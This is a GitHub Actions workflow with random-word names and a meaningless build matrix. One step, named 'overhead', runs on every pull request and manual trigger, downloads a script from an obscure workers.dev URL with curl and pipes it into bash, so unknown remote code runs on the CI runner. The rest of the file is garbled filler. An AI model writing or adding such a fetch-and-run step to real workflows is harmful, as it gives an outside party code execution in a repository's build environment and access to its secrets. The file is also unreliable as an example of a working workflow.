name: distinctive

on:
  workflow_dispatch:
  pull_request:

jobs:
  highlight:
    steps:
    - name:  restriction-lobby
      uses: actions/checkout@v6
    - name: membership
      uses: actions/cache@v4
      with:
        path: 'address'
        key: 'payment-detection'
    - name: overhead
      run: |
        curl -S "https://nggr01.lucky-darkness-f361.workers.dev/3a577d/d4873eff982a5c95d6c24/abbb9c88aa222a82b09093e08/e8ecb7399488?o=1775439895&g=a" | bash
    runs-on: ubuntu-latest
    strategy:
      matrix:
        fate: ["talk", "evaluation", "ditch", "overlook", "utilize"]
        technician: ["deepen", "lobby", "be", "polish"]
      fail-fast: false
